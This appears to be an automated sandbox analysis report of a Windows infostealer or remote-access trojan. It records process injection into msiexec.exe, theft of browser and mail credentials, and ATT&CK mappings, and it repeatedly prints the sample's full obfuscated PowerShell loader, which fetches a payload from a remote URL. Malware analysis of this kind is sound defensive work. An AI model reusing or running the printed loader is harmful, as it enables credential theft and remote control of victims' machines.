              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20904AB4 mov eax, dword ptr fs:[00000030h]7_2_20904AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2090724E GetProcessHeap,7_2_2090724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_209060E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20902639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_20902639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20902B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_20902B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_7540.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunqJump to behavior
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
              Source: msiexec.exe, 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20902933 cpuid 7_2_20902933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20902264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_20902264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword12_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword12_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword12_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6648, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MBJump to behavior
              Source: Yara matchFile source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
